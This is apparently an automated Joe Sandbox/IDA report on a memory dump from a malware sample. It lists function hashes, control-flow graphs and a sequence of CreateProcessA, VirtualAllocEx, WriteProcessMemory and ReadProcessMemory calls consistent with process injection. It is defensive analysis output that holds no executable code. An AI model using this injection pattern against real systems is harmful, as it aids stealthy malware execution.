                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: $,1D
                        • API String ID: 0-2293226186
                        • Opcode ID: cfee5c808150250293b17bf62d594b6f14cf9dbd9a975476cd02a7c83d47dcf3
                        • Instruction ID: 06ba5aa99da1db04dd0dbb95deb17c345a690a6e890f91529aecf36888f6b226
                        • Opcode Fuzzy Hash: cfee5c808150250293b17bf62d594b6f14cf9dbd9a975476cd02a7c83d47dcf3
                        • Instruction Fuzzy Hash: 56D106B4E04229CBDB64CF65D940BDDBBB6EF99300F1095EA961AB3250EB305A81CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: $,1D
                        • API String ID: 0-2293226186
                        • Opcode ID: 47253ec722500703b58878f58a40104f4af126d9175c090e642de173d76d9ce7
                        • Instruction ID: f4edf6486b5f2f53447e33aa3a38a483d59dc44615a4ad3b28b40b3ba93bc16f
                        • Opcode Fuzzy Hash: 47253ec722500703b58878f58a40104f4af126d9175c090e642de173d76d9ce7
                        • Instruction Fuzzy Hash: ADD108B4E04229CBDB64CF65D940BDDBBB2EF99300F10D5EA960AB3254EB305A81CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: $,1D
                        • API String ID: 0-2293226186
                        • Opcode ID: e9ecc4b93daaaa16d06b29321ba5264f313212b353472dbf6e245bae4a3d539c
                        • Instruction ID: 9f153d0b3ab5eb2f3c49c723d64f1f513fec26939a45099a970f922d5fc8511e
                        • Opcode Fuzzy Hash: e9ecc4b93daaaa16d06b29321ba5264f313212b353472dbf6e245bae4a3d539c
                        • Instruction Fuzzy Hash: EFD1F6B4E04229CBDB64CF65D980BDDBBB5EF99300F1095EA961AB3250DB309AC1CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: $,1D
                        • API String ID: 0-2293226186
                        • Opcode ID: 203f0a76d2dd316c867ef38a8e102287962a3497111eda3c9a3df43dc0f4c3b3
                        • Instruction ID: 98be6868bfb9071d67d581591df72f928bc828567eef76ecc83c9a75c9e2fe9d
                        • Opcode Fuzzy Hash: 203f0a76d2dd316c867ef38a8e102287962a3497111eda3c9a3df43dc0f4c3b3
                        • Instruction Fuzzy Hash: 67D1F5B4E04229CBDB64CF64D980BDDBBB5EF99300F1095EA965AB3250DB309AC1CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: $,1D
                        • API String ID: 0-2293226186
                        • Opcode ID: e0bf532f584a1610ee20da6927ed40058a15d81449e3cd8deb2d23b2c96dc036
                        • Instruction ID: 6e82799a2ec6e52c177ad6a192cecda40ace90052aa842bb448363688d04f3cb
                        • Opcode Fuzzy Hash: e0bf532f584a1610ee20da6927ed40058a15d81449e3cd8deb2d23b2c96dc036
                        • Instruction Fuzzy Hash: F4C106B4E04229CBDB64CF64D980BDDBBB5EF99300F1095EA960AB3250DB309AC1CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: #q
                        • API String ID: 0-2107286103
                        • Opcode ID: c1bfde19a2ba6ace5c127e5760571ede5527ef6cf05bc82f023034432a7f7fde
                        • Instruction ID: 9294415ca0454d2caa4dc54e0c560aedee06d746c807b8a424d0822335f5919c
                        • Opcode Fuzzy Hash: c1bfde19a2ba6ace5c127e5760571ede5527ef6cf05bc82f023034432a7f7fde
                        • Instruction Fuzzy Hash: DC81EEB4D04348DFCB59CFA5D4402AEBBB2FF46308F54886ED491AB250EB799902CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: #q
                        • API String ID: 0-2107286103
                        • Opcode ID: 69b5bc7b01e9a140bcacb246b5e1a88f4b73cb11086fd4102f57a89197e0d644
                        • Instruction ID: 50735fb23216ed334febf3f1ff840d5ec95341a0c56d04c798d3224b4dbb58f3
                        • Opcode Fuzzy Hash: 69b5bc7b01e9a140bcacb246b5e1a88f4b73cb11086fd4102f57a89197e0d644
                        • Instruction Fuzzy Hash: FD513770D05319DFDB54DFE5D5806AEBBB2BB85304F50882AE451BB350DB389942CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6{Un
                        • API String ID: 0-3244694174
                        • Opcode ID: 289b7eab066feec405747c4c521b2838fd074923816a9b6888a02b0445e8646a
                        • Instruction ID: c1ed4aa982f3f09f218c30d3daebc13202066d9bfb45b6f06a2965e411ca0fa8
                        • Opcode Fuzzy Hash: 289b7eab066feec405747c4c521b2838fd074923816a9b6888a02b0445e8646a
                        • Instruction Fuzzy Hash: 22515DB5E047158BE749CFAAD80079ABBF3FFC8310F04C4AAD558A6255EB358942CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6{Un
                        • API String ID: 0-3244694174
                        • Opcode ID: 5bae249ea060b57d1e5442830299f16e43a8439fcf79ef96d27b1e79a93ba5dc
                        • Instruction ID: 521f77a117efb5765e1c9a7cd12c82daead156f24ebe56f4a0148b3d8da9ffb0
                        • Opcode Fuzzy Hash: 5bae249ea060b57d1e5442830299f16e43a8439fcf79ef96d27b1e79a93ba5dc
                        • Instruction Fuzzy Hash: 1B415DB1E057188BEB58CFAAD80069AFAF3EFC8310F04C5AAD558A6254EB344942CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6{Un
                        • API String ID: 0-3244694174
                        • Opcode ID: ed4eb3d7471f34f861c5f0ecc4d96a50f2112991b7a1cdb9ad2df6083ffe332a
                        • Instruction ID: 6245606ba6539e961a9dee702cdf8097638f6e1c3673cb705dc46de719d93c04
                        • Opcode Fuzzy Hash: ed4eb3d7471f34f861c5f0ecc4d96a50f2112991b7a1cdb9ad2df6083ffe332a
                        • Instruction Fuzzy Hash: AD41F871E016188FEB58DFAAD950B9EBBF3AFC9200F04C1BAD508AB254DB305A45CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d19b46bcf7061b6d4bbf7d1354d9fa48aaa2f6d6812445f7027a2601f03fc00d
                        • Instruction ID: 332ac807ab106252157b0bbda1c3a7fec1b657cd9ca6672384ae79792e83cae9
                        • Opcode Fuzzy Hash: d19b46bcf7061b6d4bbf7d1354d9fa48aaa2f6d6812445f7027a2601f03fc00d
                        • Instruction Fuzzy Hash: 4CA1E374E0531ACFDB54CFA9D580ADDBBF2FB88300F10946AD54ABB254DB3099428F55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97f7ebd67a4cb4923767dbbe4be99f061925a46e782d726e99f2a2b02db86dc6
                        • Instruction ID: df765457b12d70c7388e6f81ce86dcfcb5234d0cc69880d306b148a1500ad37f
                        • Opcode Fuzzy Hash: 97f7ebd67a4cb4923767dbbe4be99f061925a46e782d726e99f2a2b02db86dc6
                        • Instruction Fuzzy Hash: C2613475E0420ADFCB04CF99D4809AEFBB2FF89320F14956AD556AB314D7749A82CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f4fd0dcd041a7291ffa8fdb9dc264abb8110ddfc8025f6c95f4a76ea51abb2e
                        • Instruction ID: 04fca8fd2b2860c3e183a652e84dc0f0e5f29eade324315c9415609c0ea4a129
                        • Opcode Fuzzy Hash: 5f4fd0dcd041a7291ffa8fdb9dc264abb8110ddfc8025f6c95f4a76ea51abb2e
                        • Instruction Fuzzy Hash: F6513874E0520A8FCB48CFAAD9416AEFBF2BF88310F15C06AD559A7255D7348A42CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24f1417f1c768109ba42408721d0bf84673056406b544c4b067d4a22fbc6e501
                        • Instruction ID: 65de8bc83604d53fbd48bf3f70dc5d68cf11064ea292bf86f4d3ee1605fbcf7a
                        • Opcode Fuzzy Hash: 24f1417f1c768109ba42408721d0bf84673056406b544c4b067d4a22fbc6e501
                        • Instruction Fuzzy Hash: DB512970E0520ACFDB58CFAAD9416AEFBF2FF88310F15C06AD559A7254D7344A428F94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20013b66ad920451ea70493fb5e5e3558bb9d35eb50e90849ee6b9e6dccfff39
                        • Instruction ID: fa31866deb699eb29c9e5ccbe4f8b2b372800aabf941fc46ffc4389a3726b8b5
                        • Opcode Fuzzy Hash: 20013b66ad920451ea70493fb5e5e3558bb9d35eb50e90849ee6b9e6dccfff39
                        • Instruction Fuzzy Hash: BE5116B4E15209DFDF04DFA5E9849EEBBB2FB88304F20A46AD901B7350E7359A018F55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c2eef300998ac74ce680ce8dc8d439e83a9ca902970c6bc4ba378eb0423b0c64
                        • Instruction ID: 0324430f6f54495185f79eb1d62648aad7a63a22bf651c1c7b524c72092d9d22
                        • Opcode Fuzzy Hash: c2eef300998ac74ce680ce8dc8d439e83a9ca902970c6bc4ba378eb0423b0c64
                        • Instruction Fuzzy Hash: A0512674D09209DFCF04DFA5E98499EBBB2FB89304F24A4AAD401B7361E7349A01CF55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2083379d1877151e3083dfe4d2ee5580fadf29873592756a7ba16e0f7b28778d
                        • Instruction ID: 85d240e42f0a3ff6521c08f0fb6f4e7eaa2c25faa70604874c42a86ab6812475
                        • Opcode Fuzzy Hash: 2083379d1877151e3083dfe4d2ee5580fadf29873592756a7ba16e0f7b28778d
                        • Instruction Fuzzy Hash: 4421F8B5E016188BDB18CFAAD9406DEBBF3FFC8350F14C16AD909A7258DB305A45CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c942eb35a79ec87dcb1f0b03c5c57c9b4e9b2fb4c37eb5cfd388510ecfb28069
                        • Instruction ID: fb17a45dc3a1fb46e201a7d808912bac3bd1581e166400361306d568f830f702
                        • Opcode Fuzzy Hash: c942eb35a79ec87dcb1f0b03c5c57c9b4e9b2fb4c37eb5cfd388510ecfb28069
                        • Instruction Fuzzy Hash: E5210AB4E056488BDB58CFAAC95029EBFF3BFC9310F14C06AD409AB358DB345A46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cc8c71e651141e6882bb0108ded516390dd13e6e6f1e711c878fbdcb9ddd121c
                        • Instruction ID: d973ae6f03bb689496ae8a0964724836fe467c80539dc5801c1ff04bab2381b1
                        • Opcode Fuzzy Hash: cc8c71e651141e6882bb0108ded516390dd13e6e6f1e711c878fbdcb9ddd121c
                        • Instruction Fuzzy Hash: 0F11D071E016199BDB18CF6BDD4469EFBF3BFC8301F04C176D918A6218EB3455528E50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c14554aae783ab223572d443a1a36eea1ac19b864204329c8d114e0d3640e67e
                        • Instruction ID: 2cb63db6f751b98bc2e87a149a49e1c665dba2609810630fb90725460b2ed759
                        • Opcode Fuzzy Hash: c14554aae783ab223572d443a1a36eea1ac19b864204329c8d114e0d3640e67e
                        • Instruction Fuzzy Hash: E911BFB1E116199BDB18CF6BDD44A9EBBF3BFC8304F04C179D508A6268EB3445428E10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 270 10da9e5-10da9e6 271 10da9e8-10da9e9 270->271 272 10da9ea 270->272 271->272 273 10da9ec 272->273 274 10da9ee-10daa89 272->274 273->274 276 10daa8b-10daaa2 274->276 277 10daad2-10daafa 274->277 276->277 280 10daaa4-10daaa9 276->280 281 10daafc-10dab10 277->281 282 10dab40-10dab96 277->282 283 10daacc-10daacf 280->283 284 10daaab-10daab5 280->284 281->282 289 10dab12-10dab17 281->289 291 10dabdc-10dacca CreateProcessA 282->291 292 10dab98-10dabac 282->292 283->277 285 10daab9-10daac8 284->285 286 10daab7 284->286 285->285 290 10daaca 285->290 286->285 293 10dab19-10dab23 289->293 294 10dab3a-10dab3d 289->294 290->283 310 10daccc-10dacd2 291->310 311 10dacd3-10dadb8 291->311 292->291 300 10dabae-10dabb3 292->300 295 10dab25 293->295 296 10dab27-10dab36 293->296 294->282 295->296 296->296 299 10dab38 296->299 299->294 302 10dabb5-10dabbf 300->302 303 10dabd6-10dabd9 300->303 304 10dabc1 302->304 305 10dabc3-10dabd2 302->305 303->291 304->305 305->305 306 10dabd4 305->306 306->303 310->311 323 10dadc8-10dadcc 311->323 324 10dadba-10dadbe 311->324 326 10daddc-10dade0 323->326 327 10dadce-10dadd2 323->327 324->323 325 10dadc0 324->325 325->323 329 10dadf0-10dadf4 326->329 330 10dade2-10dade6 326->330 327->326 328 10dadd4 327->328 328->326 331 10dae2a-10dae35 329->331 332 10dadf6-10dae1f 329->332 330->329 333 10dade8 330->333 337 10dae36 331->337 332->331 333->329 337->337
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 010DACB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 650b4755f02c87381e63ac051e0f6e44c152d9c97cf31314b224dd64cc88b9c0
                        • Instruction ID: 1248834e12a2f269b5a82bd1c366bbc85ed7b3e1a13ded3df07ba295193765c0
                        • Opcode Fuzzy Hash: 650b4755f02c87381e63ac051e0f6e44c152d9c97cf31314b224dd64cc88b9c0
                        • Instruction Fuzzy Hash: 1DC12571E00229CFDB20CFA8C840BEDBBB1BF49314F0495A9D589B7240DB749A85CF95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 338 10da9f0-10daa89 340 10daa8b-10daaa2 338->340 341 10daad2-10daafa 338->341 340->341 344 10daaa4-10daaa9 340->344 345 10daafc-10dab10 341->345 346 10dab40-10dab96 341->346 347 10daacc-10daacf 344->347 348 10daaab-10daab5 344->348 345->346 353 10dab12-10dab17 345->353 355 10dabdc-10dacca CreateProcessA 346->355 356 10dab98-10dabac 346->356 347->341 349 10daab9-10daac8 348->349 350 10daab7 348->350 349->349 354 10daaca 349->354 350->349 357 10dab19-10dab23 353->357 358 10dab3a-10dab3d 353->358 354->347 374 10daccc-10dacd2 355->374 375 10dacd3-10dadb8 355->375 356->355 364 10dabae-10dabb3 356->364 359 10dab25 357->359 360 10dab27-10dab36 357->360 358->346 359->360 360->360 363 10dab38 360->363 363->358 366 10dabb5-10dabbf 364->366 367 10dabd6-10dabd9 364->367 368 10dabc1 366->368 369 10dabc3-10dabd2 366->369 367->355 368->369 369->369 370 10dabd4 369->370 370->367 374->375 387 10dadc8-10dadcc 375->387 388 10dadba-10dadbe 375->388 390 10daddc-10dade0 387->390 391 10dadce-10dadd2 387->391 388->387 389 10dadc0 388->389 389->387 393 10dadf0-10dadf4 390->393 394 10dade2-10dade6 390->394 391->390 392 10dadd4 391->392 392->390 395 10dae2a-10dae35 393->395 396 10dadf6-10dae1f 393->396 394->393 397 10dade8 394->397 401 10dae36 395->401 396->395 397->393 401->401
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 010DACB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: cd0a6d6f5f4c9b5ec73d1d7a7a0ea3fdcc2d767b8b8a31342db9d9100026ca9b
                        • Instruction ID: f5df85a6eab220ba0d90b2a9b0bd1c9bc644abeea5d2da1c772a771aeff7aace
                        • Opcode Fuzzy Hash: cd0a6d6f5f4c9b5ec73d1d7a7a0ea3fdcc2d767b8b8a31342db9d9100026ca9b
                        • Instruction Fuzzy Hash: E6C11371D04229CFDB20DFA8C880BEEBBB1BF49314F0495A9D589B7240DB749A85CF95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 549 10da660-10da6d3 551 10da6ea-10da74b WriteProcessMemory 549->551 552 10da6d5-10da6e7 549->552 554 10da74d-10da753 551->554 555 10da754-10da7a6 551->555 552->551 554->555
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 010DA73B
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 4dff6765d5ea7a8464f6e661f4fdf6b12e84364bb280df8060b23b6ad3066403
                        • Instruction ID: facecf64c8dc4352ef58eeb96d5d2ebf8c18ef067c779a37e55fbf345caa63b1
                        • Opcode Fuzzy Hash: 4dff6765d5ea7a8464f6e661f4fdf6b12e84364bb280df8060b23b6ad3066403
                        • Instruction Fuzzy Hash: D941B8B4D052489FCF10CFA9D984AEEBBF1BB49314F14942AE815B7200C338AA45CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 560 10da668-10da6d3 562 10da6ea-10da74b WriteProcessMemory 560->562 563 10da6d5-10da6e7 560->563 565 10da74d-10da753 562->565 566 10da754-10da7a6 562->566 563->562 565->566
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 010DA73B
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 163e8f8bd0f003c02c5169375b822ef99163b7eef3bb635a994fbbb03e023146
                        • Instruction ID: a7938fb4624108fddef0f2247344f1ad8711a2d99e9e576570941ed74a74fd31
                        • Opcode Fuzzy Hash: 163e8f8bd0f003c02c5169375b822ef99163b7eef3bb635a994fbbb03e023146
                        • Instruction Fuzzy Hash: DB4197B5D052589FCF00CFA9D984AEEFBF1BB49314F14942AE919B7200D738AA45CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 571 10da7b8-10da7ba 572 10da7bc-10da7bd 571->572 573 10da7be-10da882 ReadProcessMemory 571->573 572->573 576 10da88b-10da8dd 573->576 577 10da884-10da88a 573->577 577->576
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 010DA872
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 0e9b6ee40685d77396beae610e51f3519904987b9d8cab12f02030e105c8981d
                        • Instruction ID: db5c7621610dad56cf551ab938ecfa83019d97b8871c885f2dad5eef91b58ebe
                        • Opcode Fuzzy Hash: 0e9b6ee40685d77396beae610e51f3519904987b9d8cab12f02030e105c8981d
                        • Instruction Fuzzy Hash: FC41B9B9D04258DFCF00CFA9D984AEEFBB1BB49314F14942AE815B7210C738A945CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 582 10da7c0-10da882 ReadProcessMemory 585 10da88b-10da8dd 582->585 586 10da884-10da88a 582->586 586->585
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 010DA872
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: ec8555b6542f25d700b63c5439e0f2d494d1e5b177037434c45cc16b629e0648
                        • Instruction ID: 06598774f1b1eaba974f48ea36c17beca90e66956c3c9e0189cf4c8488214a12
                        • Opcode Fuzzy Hash: ec8555b6542f25d700b63c5439e0f2d494d1e5b177037434c45cc16b629e0648
                        • Instruction Fuzzy Hash: 7D4199B5D04258DFCF10CFAAD884AEEFBB1BB49314F14942AE915B7210D734A945CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 591 10da540-10da542 592 10da544-10da545 591->592 593 10da546-10da5be 591->593 592->593 595 10da5c5-10da602 VirtualAllocEx 593->595 596 10da60b-10da655 595->596 597 10da604-10da60a 595->597 597->596
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 010DA5F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: b3618146753eebabe7664035179dc7891ba06495f7f4512823da35ad6aab0b7b
                        • Instruction ID: 780fb31c62ea1d0f7d0af039e6f6dc98ab6c7fdb7ef7a746fdb7c10392c047d2
                        • Opcode Fuzzy Hash: b3618146753eebabe7664035179dc7891ba06495f7f4512823da35ad6aab0b7b
                        • Instruction Fuzzy Hash: 944197B8D04258DFCF10CFA9D984A9EFBB1BB59314F14942AE815BB210D734A945CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 602 10da548-10da602 VirtualAllocEx 605 10da60b-10da655 602->605 606 10da604-10da60a 602->606 606->605
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 010DA5F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9e25c8b8352e9adab08dddd68a14e8fb97252822c2065a01f53e04b43945eb0f
                        • Instruction ID: bab1f8203cc8f6fdfc66cefb5c9cdf3288a615bfcb18f837d2f89b678b538d5b
                        • Opcode Fuzzy Hash: 9e25c8b8352e9adab08dddd68a14e8fb97252822c2065a01f53e04b43945eb0f
                        • Instruction Fuzzy Hash: F83195B8D04258DFCF10CFA9D980ADEFBB1BB49314F10A42AE915BB200D734A945CF68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
